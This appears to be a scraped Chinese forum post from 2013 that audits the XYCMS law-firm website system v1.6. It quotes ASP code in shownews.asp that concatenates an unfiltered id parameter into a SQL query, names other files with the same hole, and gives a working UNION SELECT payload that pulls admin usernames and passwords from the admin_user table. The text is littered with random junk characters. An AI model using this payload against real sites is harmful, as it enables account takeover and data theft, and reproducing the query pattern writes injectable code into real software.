前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似9 h( x$ y3 L1 f* V- V
+ g. |2 v8 @( [! A% d
淫荡分割线$ D$ i8 \/ s% H' p& \3 P
--------------------------------------------------------. s7 c- {2 q' x
4 G8 n3 m/ Q, y% ?1 @, |. r/ M* c审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
5 S! n2 T( y, U9 ^) E, v% o- u0 N3 I源码地址:http://down.chinaz.com/soft/29233.htm5 r+ ~ K8 v& C9 K3 z
" O7 P) m, j8 a- f. E7 R& `0 f
漏洞文件:shownews.asp2 V8 J# B' J: Z) I4 O2 j3 V
漏洞代码:7-13行
?; k% A& N, G8 I, w% l$ q
" ^; S( @) j* s$ m! P5 W2 B6 h& W/ \
9 E. T0 a1 m: Q& Y; z1 y3 ?<%
0 l# R, N7 v( C9 F$ ?id=request.QueryString("id")
! F. T3 Y& D4 K, O/ d1 L O; _
) g% k1 {* e/ O4 b+ Z& U" T" Cset snews=server.createobject("adodb.recordset")
9 ~# h2 W5 Q. K" Dexec="select * from [news] where id="&id
: ]% i {6 t0 ^( ksnews.open exec,conn,1,1
7 `: k2 K5 u3 f) k9 W%>
# [2 K& @; b* W3 o5 Q6 P
5 J! K/ }2 e2 i
( h* L/ T# o4 F2 d& A9 P什么过滤都没有 直造成注入: ?) f; o* [! j3 ]
6 C& O' ?, a* R' Q% s+ ]* P
注入点:http://127.0.0.1:99/shownews.asp?id=xx% k# [- ?+ N R! r
# P) N7 F" j' [! m( F其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
0 A/ L/ o7 q6 j- E' q
) x! [ }% q. }" f; A! g" \: X6 J% E
. k; [: q* H3 r% Y- U9 Vexp: union select 1,admin,password,4,5,7 from admin_user) o: c6 i3 V7 b2 ?1 g# r
; @* a/ U5 H9 {3 @
|
发表于 2013-4-4 17:28:12
收藏
支持
反对